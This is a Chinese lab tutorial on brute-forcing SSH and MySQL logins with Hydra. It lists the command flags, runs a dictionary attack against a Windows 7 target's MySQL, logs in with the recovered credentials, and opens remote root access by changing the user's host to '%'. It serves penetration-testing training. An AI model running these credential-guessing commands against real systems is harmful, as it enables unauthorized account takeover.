当前位置:   article > 正文

渗透测试-暴力破解之hydra_hydra mysql

hydra mysql

暴力破解之hydra

前言

一、什么是暴力破解

暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。

二、暴力破解枚举之hydra

1.hydra相关语法

kali自带的hydra
hydra -l root -p root 172.26.2.36 ssh
-l 指定用户名
-L 指定用户名字典
-p 指定密码
-P 指定密码字典
-C 使用冒号分隔,root:root
-M 指定目标列表文件
-f 在找到第一队登录名和密码时停止

2.利用hydra进行爆破获取用户信息

打开window7靶机的mysql
在这里插入图片描述
这里我自定义爆破字典进行爆破
自定义用户ok.txt,密码字典cmd.txt
在kali中打开hydra输入
hydra -L cmd.txt -P ok.txt 192.168.222.97 mysql -f
爆破win7的数据库用户名和密码
用vim ok.txt进行编译即可
在这里插入图片描述
爆破成功,出现用户名和密码,进行登录连接数据库
输入mysql -h 192.168.222.109 -u 账号 -p 密码
登录成功,可以利用数据库查询得到可利用的信息。

这里可能会出现hydra连接不上win7的mysql,解决方法如下,打开数据库进行修改一些配置信息
(1)利用kali中的hydra连接外机的数据库时,有时连接不的解决方法是:

改表法。可能是你的帐号不允许从远程登陆,只能在localhost。这个时候只要在localhost的那台电脑,登入mysql后,更改 “mysql” 数据库里的 “user” 表里的 “host” 项,从"localhost"改称"%"

mysql -u root -pvmwaremysql>use mysql;
mysql>update user set host = ‘%’ where user = ‘root’;
mysql>select host, user from user;
flush privileges;

总结

本次实验简单介绍了暴力破解工具hydra的简单使用,学会对hydra关键语句的使用,利用语句和字典对数据库,ssh进行爆破获取用户信息。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/130783
推荐阅读
相关标签
  

闽ICP备14008679号